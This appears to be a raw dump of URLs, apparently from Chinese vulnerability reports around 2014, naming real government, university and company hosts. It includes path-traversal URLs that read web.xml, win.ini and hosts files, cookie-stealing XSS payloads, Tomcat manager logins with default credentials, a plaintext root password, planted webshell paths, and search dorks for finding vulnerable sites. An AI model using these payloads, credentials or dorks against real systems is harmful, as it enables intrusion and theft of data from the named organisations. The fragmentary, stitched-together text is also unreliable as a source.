http://www.xnbb.gov.cn/ http://www.shunshan.gov.cn/ http://www.banqiao.gov.cn http://xctzb.swufe.edu.cn/list.aspx?keyword=1 xctzb.swufe.edu.cn/manage http://academy.yonyou.com http://academy.yonyou.com/ViewCourseMap.aspx?infoid=15 http://www.qc5qc.com/xqc/mlpxyy/mlpxcx_info.php?tid=1500100 http://www.qc5qc.com/xqc/mlpxyy/mlpxcx_info.php?tid=2500100 http://www.qc5qc.com/xqc/mlpxyy/mlpxcx_info.php?tid=1500100%27 https://www.google.com/search?newwindow=1&noj=1&biw=1024&bih=677&q=inurl%3Axxcontent.jsp%3Frowid&oq=inurl%3Axxcontent.jsp%3Frowid&gs_l=serp.3...7362.7362.0.7987.1.1.0.0.0.0.187.187.0j1.1.0....0...1c.1.49.serp..1.0.0.ZpMjnFhtfmU http://bbs.pageadmin.net/showtopic-28377.aspx http://baike.baidu.com/view/2843084.htm?fr=aladdin,网址http://www.shangxueba.com http://www.shangxueba.com/jingyan/1641941.html突然发现写的代码不见。 http://121.14.133.17:9010//resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.17:8090/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.7:5100//resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.7:8081/ http://www.xinyangcb.cn/ http://www.xinyangcb.cn/onews.asp?id=2630 
http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1 http://127.0.0.1//cowork/CoworkLogView.jsp?id=151 http://127.0.0.1/system/basedata/basedata_role.jsp?roleid=32 http://127.0.0.1//system/basedata/basedata_hrm.jsp?resourceid=3 http://oa.udata.cn:88/login/Login.jsp http://oa.ahaxfz.com/login/Login.jsp http://oa.chinakingking.com/login/Login.jsp http://oa.ewell.cc:8080/login/Login.jsp http://thqm.wo.com.cn/thqm/searchCy.action http://jxjy.yzrsks.com/book/subbook.jsp?aid=1&nid=1 inurl:News/news_list.jsp http://www.ikang.com/ http://weixin.lenovo.com.cn/lenovo_admin_weixin/ http://121.14.133.28:8082/ http://121.14.133.28:8090//resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.46:9000/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://121.14.133.43:9000/ http://wcm.xxz.gov.cn:8080/wcm/ http://gk.sx******.gov.cn:8080/kdgs/ http://www.han****.gov.cn:8080/kdgs http://www.bdcgs.com/ http://www.bdcgs.com/bdcgs/newsone.jsp?tid=24 http://121.14.133.43:9000/.svn/entries http://cisse.casw.org.cn/announce.php?id=29 http://www.ziroom.com/event/?_p=cheer&_a=upload http://xuexi.jxgh.org.cn/Web/Course.aspx?typeid=38 http://m.dianwoba.com/h5/supplier/market!asynMarketItemList.do?currentPage=1&itemType=&keyword=*&market=1 http://www.agrij.com/) inurl:login_form.jsp http://www.baidu.com/s?tn=sitehao123&ie=utf-8&f=8&wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%8D%97%E4%BA%AC%E6%A3%AE%E5%B8%95%E7%BD%91%E7%BB%9C&oq=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%8D%97%E4%BA%AC%E6%A3%AE%E5%B8%95%E7%BD%91%E7%BB%9C&bs=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%8D%97%E4%BA%AC%E6%A3%AE%E5%B8%95%E7%BD%91%E7%BB%9C&rsv_bp=1&inputT=95375&rsv_sug3=32&rsv_sug4=2156&rsv_sug1=2&rsv_sug=1 http://meeting.gdbnet.cn URLhttp://meeting.gdbnet.cn/MyBooks/ServerHandle/ http://meeting.gdbnet.cn/MyBooks/ServerHandle/GetDatas.aspx http://weixin.net05.cn/ http://weixin.net05.cn/login.html http://weixin.net05.cn/agencyAdmin/login.html 
http://www.eccn.com/events/2012/intel/news.html?info=2013012814280480 http://qts.rails.cn/ http://qts.rails.cn:80/qts/default.qts www.llrc.com.cn没发现什么明显的漏洞,看这张图 qq:635833 http://wowb.cn http://wowb.cn/index/huodong/index!getLastActivity.action http://www.skynj.com/ https://wen.lu/?gfe_rd=cr&ei=sgzPU8j1FqHJ8gfel4HQDQ&gws_rd=cr#q=inurl:homepages%2Fcontent_page.aspx http://www.xiangtan.gov.cn/cms/voteManager/seeresult_bz.jsp?titleid=1 http://kh.xiao5u.com/?sj=2014 inurl:asp?sort_id= http://209.116.186.246/#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E5%8E%A6%E9%97%A8%E6%98%93%E5%95%86%E7%BD%91%E7%BB%9C%E7%A7%91%E6%8A%80+inurl:asp%3Fsort_id%3D http://www.luchuankeji.com/List.asp?Shop_ID=930 http://www.rrkfw.com/List.asp?Shop_ID=991 http://www.xfym.net/products1.asp?sort_id=148 http://www.zzxsdz.com/product.asp?sort_id=148 http://www.shanghaizhongmin.com/product.asp?sort_id=148 http://www.luchuankeji.com/product.asp?sort_id=148 http://www.chinaguirong.com/product.asp?sort_id=148 URL:http://www.sxsj.gov.cn/index!reception inurl:ArticleShow.asp?ArticleID= http://209.116.186.246/#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E4%B8%87%E7%9B%88%E7%BD%91%E7%BB%9C+inurl:ArticleShow.asp%3FArticleID%3D http://www.nbhqly.com http://www.nbkc.com.cn http://www.nbbcly.com http://www.toyoung.net http://www.dh-ip.com http://ningbotm.net http://www.nbtianyu.com http://www.eszxun.com www.skynj.com inurl:homepages/index.aspx http://mec.ikang.com/log.txt http://mec.ikang.com/sqlnet.log http://wooyun.org/bugs/wooyun-2014-063744 http://www.hnpynx.com/ http://www.hnpynx.com/show.asp?class=2&id=1282 http://rahy.gov.cn/ ftp://rahy.gov.cn/ http://58.22.138.34:8080/login.html http://58.22.138.34/axis2-admin/upload http://58.22.138.34/axis2-admin/ http://58.22.138.35/cois/mobileOA.nsf/ http://58.22.138.35/cois/mobileoa.nsf/frmAnalysis http://58.22.138.35/cois/mobileoa.nsf/frmhome?openPage http://58.22.138.24/login.aspx http://bwc.ncu.edu.cn/new.asp?class=3&id=666 
http://spm.ncu.edu.cn/static/NewsList.asp?Type=3 http://fxcs.ncu.edu.cn/xxggxs.asp?xxid=1 http://wap3.qiushibaike.com/login http://nearby.qiushibaike.com/user/100/detail http://pubmail.iscas.ac.cn/needlogin.action http://login.koolearn.com/sso/toBackPwd.do?nextPage=http%3A%2F%2Fi.koolearn.com%2F http://www.dapu.com/passport-sjzcstep2.html?mobile_number=13111111111&backurl=undefined http://61.144.78.156:8080/manager/html user:tomcat pass:tomcat http://61.144.78.156:8080/system/ http://www.hrbxzsp.gov.cn/www_web/index.jsp http://www.hrbxzsp.gov.cn:8080/template/yindao.htm http://www.hrbxzsp.gov.cn/viewggl.jsp?nid=126342 http://www.hrbxzsp.gov.cn:8080/template/zxbs/zxbs_bgxz_list.jsp http://www.hrbxzsp.gov.cn:8080/fileFetcherServlet?filePath=E:\hrbweb\WebRoot\WEB-INF\web.xml http://www.hrbxzsp.gov.cn/fileFetcherServlet?filePath=D:\HIGHCOM\jboss-4.0.4.GA\jboss-4.0.4.GA\server\default\deploy\xzsp_hrb_oracle.war\web.xml http://www.hrbxzsp.gov.cn:8080/fileFetcherServlet?filePath=C:\Windows\System32\drivers\etc\hosts http://www.fsmcms.com.cn/html/p/p_16/p_16.html http://mail.maimaibao.com/ http://www.ccnhongli.com/pShow.asp?classid=2&id=13 http://www.zjdegal.com/newsShow.asp?classid=1&id=9 http://www.wzxhkj.com.cn/news_show.asp?classid=2&id=11 http://cottonbaby.com.cn/pShow.asp?classid=2&id=6 http://beilaile.cn/pShow.asp?classid=6&id=32 http://aixjd.com/teastu_show.asp?classid=19&id=321 http://www.wzfa.org/news_show.asp?classid=9&id=35 http://www.cnxjsj.com/pro_show.asp?classid=8&id=2 http://www.cptshop.com/index.htm http://localhost/file/upload/201407/23/21-48-13-93-4.swf http://220.181.136.39:9080/icpv3.0/ConfigCenter)中,任何人可直接浏览或下载其他用户上传的身份证、核验单等电子文件 http://123.sankuai.com/ http://task.sankuai.com/,我只成功了一枚账号,密码123456。。。 https://sso.sankuai.com/login,成功了若干,单点登录之后,能做的事情就很多了。。。 http://cosmopolitan.joins.com/fashion/?strFCateCd=AAA0 http://qtv.joins.com/QTVprg/sunNmoon/?proIdx=177 http://122.194.14.77:8080/manager/html user:admin pass:123456 
http://marx.ustb.edu.cn/Uploads/file/3.asp;%281%29.jpg http://marx.ustb.edu.cn/NewsConfig.aspx http://www.yesmywine.com/这个。百度一下也能收到,晒个图片吧!! http://mall.yesmywine.com/groupbuy/index.jspa http://web.ynufe.edu.cn/jiguan/rsc/showsecond.asp?id=495 url:http://116.236.243.4:80/manager/html user:admin pass:admin http://116.228.145.139 url:http://116.228.145.139:80/manager/html user:admin pass:admin http://gd.10086.cn/gzdh/yhzq/action/view.do?productId=000001#rd,点进去可以看到动态密码这一栏,手机号随便输然后点击获取 http://60.28.43.83:8096/consult/search/findSchoolInfo.action url:http://218.13.180.139:80/manager/html user:tomcat pass:tomcat https://121.18.214.106/ http://mta.nankai.edu.cn/news_con.php?nid=196 http://mta.nankai.edu.cn/news_con.php?nid=196 http://sqlmap.org http://xxgk.ustc.edu.cn/infoplat/toDetailPage.action?id=142 http://www.txrcb.com/ http://www.txrcb.com/shownews.asp?id=270 http://www.txrcb.com/mydown/login.asp http://www.xnxyls.com/culture_show.asp?id=210 url:http://61.135.22.1:80/manager/html user:admin pass:tomcat http://www.7stars.net.cn/ http://szj.erqi.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://180.168.124.135/ http://cts.nankai.edu.cn/show.asp?id=57 http://cts.nankai.edu.cn/show.asp?id=57 http://sqlmap.org http://www.400apps.com/ www.cq.cn rdp://211.161.45.190:3389 rdp://220.115.240.66:3389 http://www.zqgwbn.com/install.asp http://www.gwbnah.net.cn/phpMyAdmin/ http://www.cdgwbn.com.cn/index.php?cate_id=13&m=Article&temp=c%3A%2Fboot.ini http://www.baomi.org/ http://www.baomi.org/bmyw_info.php?optionid=23&auto_id=1585 http://www.baomi.org/zytsyx_info.php?optionid=48&auto_id=82 http://www.baomi.org/bmyw.php?optionid=10 http://www.baomi.org/zytsyx.php?optionid=16 http://www.baomi.org/bmzz_news_info.php?optionid=58&auto_id=438 http://www.letv.com/houtai/ http://guojiadajuyuan.com/search.php?r=2014-07-25 http://122.226.213.169/music_actor.html?id=908 http://www.duba.com/music_actor.html?id=908 
http://www2.lib.nankai.edu.cn/nav/Chinese/show/data_detail.asp?name= http://www2.lib.nankai.edu.cn/nav/Chinese/show/data_ http://sqlmap.org http://www.sxwsks.com/system_dntb/uploadFile.aspx http://pharmacy.nankai.edu.cn/english/article.php?article=24 http://pay.nankai.edu.cn/phpmyadmin/ http://pay.nankai.edu.cn/?phpinfo=1 http://www.cofcorice.com/ability/ViewResume.aspx?Userid=32 http://www.cofcorice.com/ability/ViewResume.aspx?Userid=1 http://www.cofcorice.com/ability/ViewResume.aspx?Userid=2 http://www.cofcorice.com/ability/ViewResume.aspx?Userid=3 http://bbs.gexia.com/thread-32-593575.aspx http://bbs.gexia.com/dialog/forget.aspx?publishmentSystemID=1 http://wooyun.org/bugs/wooyun-2014-065197 http://www.crbcint.com/lqcms/net/Content.action?version=1 http://www.kuaifan.net; site:t.iqiyi.com inurl:php t.iqiyi.com/pub/jump.php http://www.cicro.com/ inurl:/browser/content.jsp?id= http://www.xy.gov.cn/jsp/zwgk/browser/content.jsp?id=476 http://www.zb.gov.cn/jsp/zwgk/browser/content.jsp?id=23 http://www.xjmd.gov.cn/jsp/zwgk/browser/content.jsp?id=2439 http://www.dyq.gov.cn/jsp/zwgk/browser/content.jsp?id=46 http://sj.shufe.edu.cn/jsp/qikan/browser/content.jsp?id=6918 http://u.ly169.cn/icbc/admin/login.asp http://www.jlnanx.com/asktotal.jsp?type=0&pid=22 http://218.201.4.5/security/login.do http://222.223.34.25/gpsweb/index.aspx 
http://www.sogou.com//websnapshot?ie=utf8&url=http%3A%2F%2Fqq.mb5u.com%2Fabout.html&did=65b505059bf9e58d-1152efedfc5effe9-134fa5d0b31d02dc09750e547cb02b87&k=fd2b0d13138196abc9b801bca9d59b27&encodedQuery=&query=qq.mb5u.com%2Fabout.html&&pid=sogou-wsse-7535bbb91c8fde34&duppid=1&w=01020400&m=0&st=0&uid=1250&ref=&furl=http%3A%2F%2Ftongjige.com%2F&title=%E7%BB%9F%E8%AE%A1%E5%93%A5_%E8%90%A5%E9%94%80%E7%8E%8B_%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1-%E8%AE%BF%E5%AE%A2QQ%E6%8A%93%E5%8F%96--%E8%AE%BF%E5%AE%A2QQ%E6%8F%90%E5%8F%96-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E6%8A%93%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E8%8E%B7%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E8%AE%BF%E5%AE%A2QQ%E6%8F%90%E5%8F%96%E7%B3%BB%E7%BB%9F-%E7%BD%91%E7%AB%99%E7%BB%9F%E8%AE%A1QQ%E7%B3%BB%E7%BB%9F%E6%BA%90%E7%A0%81%7C%E8%AE%BF%E5%AE%A2QQ%E7%BB%9F%E8%AE%A1%7CQQ%E8%AE%BF%E5%AE%A2%E7%BB%9F%E8%AE%A1 http://user.app.xywy.com/myplus.php?act=detail&type=1&plusid=175357 http://www.fenby.com/course/units/1058 coding:utf8 http://gzbzt.com/forum/view.php?id=2 http://114.80.121.203:8000/zabbix inurl:siweb/login.do http://218.9.***.***:8082/siweb/ http://60.219.***.***:7001/siweb http://218.9.***.***:8081/siweb http://111.75.***.***:8001/siweb http://***.***.gov.cn:8001/siweb/ http://www.dapu.com/product-askdetail-696-35542.html http://www.dapu.com/product-askdetail-879-35562.html http://www.shopin.net/ http://bf.baidu.com/ http://bf.baidu.com/team/detail/282591 http://bf.baidu.com/team/detail/282591 s.blued.cn/users/786461 www.kouclo.com http://shop.kouclo.com/business/login Url:http://api.xiniugushi.com:80/function/account.php http://www.baixing.com:80/xinxi/delete?adId=文章ID&view=0 http://www.51lepai.com/website.rar http://124.205.90.244 url:http://124.205.90.244:8080/manager/html user:admin pass:admin http://221.232.136.62:91/pm/sys/Login_dologin.action url:http://125.64.93.214:8080/manager/html 
user:tomcat pass:tomcat url:http://218.7.71.244:8080/manager/html user:tomcat pass:tomcat url:http://222.33.62.22:8080/manager/html user:tomcat pass:tomcat http://v2.freep.cn/3tb_14072610260155ef512293.jpg http://bbs.qibosoft.com/down2.php?v=download1.0#down http://www.zjubiolab.zju.edu.cn/lesson/news.php?action=show&id=991 http://yunfeng.zju.edu.cn/news.php?action=show&id=3943 www.zchospital.com/cms/ www.zjqhyy.com/cms/ www.zjhl.org/cms www.ywzxyy.com/cms/ www.z2hospital.com/cms www.zjtongde.com/cms/ www.ks2y.com/cms/ nhdyyy.com/cms/ www.hnzyy.cn/cms/ www.zjukidney.com/cms/ www.zjukidney.com/cms/ http://stat.ccidnet.com/seo/help.php http://hdy.njmu.edu.cn/jnt/jnt_grda_jnwx_read.php?id=319¤tJNTId=58 http://hdy.njmu.edu.cn/jnt/jnt_grda_jnwx_read.php?id= http://sqlmap.org https://211.68.223.12/vpnweb/help.php?para=index https://211.68.223.12/vpnweb/help.php https://219.129.33.114:10009/vpnweb/help.php http://demo.dtcms.net/scripts/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://blog.qiyuuu.com/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://be-evil.org/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://www.mldw.gov.cn/data/myweb/bmxx/news/shtml/102/index.html http://www.qhdzfzz.gov.cn/images/pr/790/index.asp http://www.sdqx.gov.cn/fbxx/xxfk/1140/index.html http://yjsb.xijing.edu.cn/Zongg/xppic/cert/337/index.html http://www.xjgt.gov.cn/JS/FreeJs/cert/3792/index.html http://www.kelkfq.gov.cn/fckeditor/editor/dtd/1659/index.html http://www.dege.gov.cn/Styles/yx/WN5/index.asp http://xydj.xiaoyi.gov.cn/editor/58639/578/379/947/index.asp 
http://www.mldw.gov.cn/data/myweb/bmxx/news/shtml/102/index.html http://www.yunfufgj.gov.cn/download/qp1/mxBQx/pcQOX/PeXI4/index.asp http://www.czmz.gov.cn/images/hgio;/3792/index.html http://www.qzx.gov.cn/image/kyufxs/267/index.html http://www.mldw.gov.cn/data/myweb/bmxx//html/info/340/index.html http://www.dege.gov.cn/Styles/yx/um5/index.asp http://www.xjgt.gov.cn/JS/FreeJs/cert/3792/index.html http://www.mldw.gov.cn/data/myweb/bmxx/news/shtml/21/index.html http://tzb.xiaoyi.gov.cn/smartstat/1620/5011/42898/0036/index.asp http://www.mldw.gov.cn/data/myweb/bmxx/news/shtml/125/index.html http://ccfx.changchun.gov.cn/blog.nolog/SCRIPT/common/8329/index.html http://www.jyqwsj.gov.cn/bbs//2507/ http://tjj.sqsc.gov.cn/jsrun/14008.html http://tzb.xiaoyi.gov.cn/smartstat/03199/0760/80727/088/index.asp http://www.zgtks.gov.cn/dwjs/dwtd/1297/index.html http://tzb.xiaoyi.gov.cn/smartstat/75067/766/666/5397/index.asp http://www.sdqx.gov.cn/fbxx/xxfk/1140/index.html http://www.yunfufgj.gov.cn/download/kCuD/ShdK/Nfp6/5kN/index.asp http://www.sdqx.gov.cn/fbxx/xxfk/1689/index.html http://www.dege.gov.cn/styles/yx/u910/index.asp http://www.dfzb.suzhou.gov.cn/2035/index.asp http://tzb.xiaoyi.gov.cn/smartstat/75067/51495/6840/82784/index.asp http://3dbae.xadrc.gov.cn/ http://tzb.xiaoyi.gov.cn/smartstat/1066/642/552/3129/index.asp http://www.hhhtjxw.gov.cn/person/jkld/index.html http://tjj.sqsc.gov.cn/upLoadFile/uploadfile/zontes/5170/index.html http://www.agrij.com/) inurl:login_form.jsp http://www.jsxyidc.com/ http://down.chinaz.com/soft/30486.htm http://localhost:58031/online.asp http://localhost:58031/common.asp?id=1 http://localhost:58031/news.asp?id=3 http://localhost:58031/shownews.asp?id=66 http://localhost:58031/showkbxx.asp?id=32 http://localhost:58031/showgkk.asp?id=4 http://localhost:58031/showpxxm.asp?id=24 http://localhost:58031/showteam.asp?id=35 http://localhost:58031/showdownload.asp?id=19 http://localhost:58031/showxyzp.asp?id=35 http://unhr.com.cn/ 
http://www.szyfpx.com/online.asp http://www.hssjy.com/online.asp http://www.hbwfds.gov.cn/online.asp http://www.duowencw.com/online.asp http://www.btwx.cn/online.asp http://202.199.240.28/jgzx/online.asp http://www.ephpzx.com/online.asp http://www.wcsqsnhdzx.com/online.asp http://qingyiclub.com/online.asp http://www.shapancmi.org/online.asp inurl:showxyzp.asp?id= site:gov.cn inurl:showpxxm.asp?id= site:gov.cn inurl:online.asp http://www.hssjy.com/shownews.asp?id=66 http://202.199.240.28/jgzx/showpxxm.asp?id=35 http://www.ephpzx.com/shownews.asp?id=199 http://unhr.com.cn/showxyzp.asp?id=82 http://sa.bupt.edu.cn/news/newscontent.aspx?newsid=485 http://218.245.6.176/pages/LoginApp/app_m.html http://www.lpai.com.cn/website.rar inurl:managerOneGgxxfb.action http://ecard.sdu.edu.cn/ggxxfb.action?lmid=53d6b69231bd74d70132149514b60001 http://ecard.sdu.edu.cn/xxsearch.action?lmid=53d6b69231bd74d70132149514b60001 http://ecard.sdu.edu.cn/managerOneGgxxfb.action?fbxxid=53d6b6923cff8518 http://www.sqlmap.org http://star.rayli.com.cn/web.config http://star.rayli.com.cn/bbs http://adsite3.rayli.com.cn/common_vote/common_savevoteinfo.php http://miyou.beauty.rayli.com.cn/fls/?s=37 http://star.rayli.com.cn/services/service.php?m=u&a=album&width=190&home_id=12611309 http://www.onlylady.com/files/eventapi.php?c=SimpleVote&a=getOscars&options=201405190001 inurl:/ArticleContent.jsp?id= http://www.zscz.gov.cn/ArticleContent.jsp?id=4567 http://www.sycz.gov.cn/ArticleContent.jsp?id=2352 http://wwwoth.qhmc.edu.cn/cjxy/ArticleContent.jsp?ID=202 http://lclh.gszy.edu.cn/ArticleContent.jsp?ClassID=4&ID=86 http://www.xiao5u.com/ http://www.xiao5u.com/Product/Survey.html http://www.bmga.gov.cn/diaocha/ http://www.jhdj.gov.cn/wjdc/ http://www.kpjsedu.cn/Survey/index.asp http://oa.jys.ykedu.net/xs2/ http://www.dbjxxx.net/survey/ http://www.ccatcpa.com/toupiao/ www.Xiao5u.Com http://www.cclinux.com/index/project.asp http://121.12.117.111:9231/v2014-admin/ http://www.agrij.com/) inurl:login_form.jsp 
http://202.99.207.13:8081/finance11n/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://124.164.240.217:8080/finance03/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://111.12.148.194:7005/finance_qhld/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://61.185.74.147:8080/finance67/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://nat.nat123.net:11158/finance/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://www.cldwcwgk.gov.cn:8083/finance80/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://116.255.135.35:8082/finance_glx/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://221.131.81.143:7001/finance_oracle/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://202.99.207.13:8081/finance11n/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://124.164.240.217:8080/finance03/servlet/downloadfile?filename=/../../../conf/web.xml&userid=/ http://111.12.148.194:7005/finance_qhld/servlet/downloadfile?filename=/../WEB-INF/web_ODBC.xml&userid=/ http://61.185.74.147:8080/finance67/servlet/downloadfile?filename=/../WEB-INF/dbBean.java&userid=/ http://www.cldwcwgk.gov.cn:8083/finance80/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/ http://t9.tongda2000.com/ http://t9.go2oa.com:86/ http://t9.go2oa.com:86/t9/t9/core/funcs/system/act/T9SystemAct/doLoginIn.act http://feedback.uc.cn/feedback/feedback/index?instance=pc_client&pf=145 http://www.sxsrmyy.com/ss/lindex.asp http://gdl.seu.edu.cn:8080/readnews.php?newsid=32 http://gdl.seu.edu.cn:8080/jnt/jnt_grda_jnwx_read.php?id=304¤tJNTId=34 http://www.dhybzx.org) http://czt189.com/Admin/AdminLogin.aspx http://czt189.com//FileLoadImg/201407261809ASP.asp www.rar文件,很不安全!!! 
http://magazine.tcl.com/manager/login.aspx http://magazine.tcl.com http://222.83.30.166/ http://222.83.30.166/nps/speed/testingSpeedAction!testingSpeed.action还是root权限...~ http://121.28.35.250:8080/cms/loginAction.action http://121.28.35.250:8080/cms/loginAction.action server:/usr/local/www/jdk1.6/jre/lib/i386:/usr/local/www/jdk1.6/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib http://java.sun.com/ http://jz.smegx.com/customers/ inurl:article.php?titleId= http://www.gxlawyer.com/article.php?titleId=63 http://www.sqlmap.org www.gxlawyer.com\session http://www.xiao5u.com/ http://down.chinaz.com/soft/31094.htm http://localhost:58031/feedback.asp http://www.zkzjnu.com/feedback.asp http://219.159.230.131:9090/feedback.asp http://www.sxdtdx.edu.cn/lslyxy/feedback.asp http://www.naswsxf.com/feedback.asp http://www.yxfssl.com/feedback.asp http://jyx.hbust.com.cn/feedback.asp http://www.jyzx58.cn/feedback.asp http://www.wxhongen.com/feedback.asp http://www.jy0539.com/feedback.asp Www.Xiao5u.Com http://www.cclinux.com/index/project.asp http://121.12.117.111:9231/v2014-admin/forum/forum_list.asp?fid=6 http://newcar.xcar.com.cn/auto/index.php?r=dealerPopw/orderpost http://nx.bbn.com.cn/biz/zhs_alllist.php?zsfx_id=8&fdiqu= http://www.women.org.cn/women/searchAttachment http://www.fjwomen.org.cn/Template/fexxCatalog.jsp?currCatalogID=20070829463234 http://www.gxwomen.org.cn/vote/?id=6 http://www.hljwomen.org.cn/Polls/PollSearchList.aspx?PollCategoryID=-1&strKey= http://app.gdwomen.org.cn/fltuijian/details/music.php?mid=4 http://www.jnwomen.org.cn/pcontent.asp?id=2713 http://www.zjswomen.org.cn/all/all.php?Id=132 http://www.zjswomen.org.cn/artcount/articlecount.htm1?func=get&articleid=15324 http://www.gxgxw.gov.cn/CommonPage/ArticleSearchResults.aspx?publishDate=2014-07-01 http://www.chinaamc.com/product/selectFundInfoByHSHUO.dofundCode=008006¤tPage=0&beginDate=&endDate= http://116.228.171.46/ http://116.228.171.46/Home/Login http://sqlmap.org 
http://116.228.171.53:8002/ http://www.rongdaqhd.com/soft/product.html http://121.28.35.202/www/news_list.php?cat1id=2&cat2id=6 http://60.213.186.122:81/www/news_list.php?cat1id=2&cat2id=7 http://zxzj.cangzhou.gov.cn/www/news_list.php?cat1id=3&cat2id=8 http://60.10.25.13/www/news_list.php?cat1id=3&cat2id=8 http://www.bdzxzj.gov.cn/www/news_list.php?cat1id=3&cat2id=8 http://www.dzsjcj.gov.cn/www/news_list.php?cat1id=3&cat2id=21 http://221.193.194.131/www/news_list.php?cat1id=3&cat2id=8 www.shandongweb.com/ tel:10086 tel:10086 tel:10086 http://api.zj189.cn/sendmessage.php?wsdl http://api.zj189.cn/lxjkweb/index.php/Message/p?notice=1&p=3 http://www.hagaozhong.com http://218.29.79.78 http://www.hagaozhong.com/recruit/policy/Default.aspx?key=1 http://218.29.79.78/recruit/policy/Default.aspx?key=1 http://member.aili.com/note/add http://121.40.72.69:8080/logServer/user/login url:http://121.40.72.69:8080/manager/html user:admin pass:admin http://jingdian.wo116114.com/search.aspx?scname=1 http://hbsemp.unisk.cn/getSource.jsp?bq_name=1 http://emp.sh.chinaunicom.com/getSource.jsp?bq_name=1 http://61.158.142.197/getSource.jsp?bq_name=1 http://sdemp.unisk.cn//getSource.jsp?bq_name=1 http://tjemp.unisk.cn/getSource.jsp?bq_name=1 http://lnemp.unisk.cn/getSource.jsp?bq_name=1 http://nmemp.unisk.cn/getSource.jsp?bq_name=1 http://ynemp.unisk.cn/getSource.jsp?bq_name=1 http://jsuemp.unisk.cn/getSource.jsp?bq_name=1 http://sxtemp.unisk.cn/getSource.jsp?bq_name=1 http://gdemp.unisk.cn/getSource.jsp?bq_name=1 http://jlemp.unisk.cn/getSource.jsp?bq_name=1 http://hnhemp.unisk.cn/getSource.jsp?bq_name=1 http://www.js.chinaunicom.com/shop/sales/SalePhoneCtrl.do?sale_type=2&oper_flag=phone_info&goods_id=5881&phone_promotion=A&city_id=0&user_type=old http://game.nearme.com.cn/findPwdValid这个接口跑验证码 http://oauth.nearme.com.cn/oauth/XAccessTokenServlet http://cofcomag.cofco.com/cn/cn.rar http://bw.xjtu.edu.cn/119/show119.php?recid=3325 user:root password:z800926q http://www.chinarishi.gov.cn 
http://weixin.homeinns.com/travel/travel4.php?id=1401727901 http://bbs.dota2.com.cn/forum.php http://cache.baiducontent.com/c?m=9d78d513d99910e84fece43d495280711824d4743da7c7150fc39238923803061e3da7f9302360018b8d253415e80902e5aa7034751421c486d5d71986e5852858c97d73364dd95612a448f2945b649b67d60bb6b81990eda67584aea58283&p=9a63c11986cc41ac5cb5c7710f0e80&newp=9879ce16d9c133f708e2947d095e93231610db2151d7da110d8c&user=baidu&fm=sc&query=hCuQvVeF%2B3NJUKIVP7jZKA&qid=&p1=1 inurl:ns.php?cl=ns http://www.achang8.com/ns.php?cl=ns&nowmenuid=10012158 http://www.sqlmap.org www.achang8.com\session http://dwb.ahu.edu.cn/dwfc.asp?nClass_Id=36 http://www.xsc.ahu.edu.cn/moreNews.asp?typeid=31 http://www2.ahu.edu.cn/bwc/newdetail.php?NID=4 http://oldjjxy.ahu.edu.cn/xygk.asp?NewsID=861 http://zfgjj.km.gov.cn/website/website.do?act=download&id=2810&path=c:\Windows\win.ini&name=win.ini http://game.sports.sina.com.cn url:http://ekp.zt17.cn/ http://vpn.lib.xjtu.edu.cn/www/index.php?controller=VpnIndex&action=See&announceid=21 http://vpn.lib.xjtu.edu.cn/www/index.php?controller=VpnIndex&action=See&announceid=21 http://blog.csdn.net/bestwear1002/article/details/38221935 http://www.xiangtan.gov.cn/login.jsp http://demo.cuumall.com/ https://account.oppo.com/index.php?q=user/getbackpass&back=http%3A%2F%2Fwww.oppo.com%2F https://account.oppo.com/index.php?q=user/confirmid&type=1&sign=e9fb209c9416fb0312980c47c4537f0b http://121.199.160.233/ http://192.168.0.11/ http://172.58.14.253/ http://topic.xcar.com.cn/HONDA_ACCORD/comment/?topic_id= http://t***.taobao.com/upload/201407/0bda13c09fa040256add00fe3377ec6d.php http://123.127.67.30/ http://yjsc.ahau.edu.cn/web/infoList4.aspx?kind=01 http://qhwx.ahau.edu.cn/include/web_content.php?id=1364 http://mail.12306.cn/app/mail/login http://www.bjcz.gov.cn:9999/ly/caizheng/test/restore_content.jsp?letters_id=100634存在sql盲注 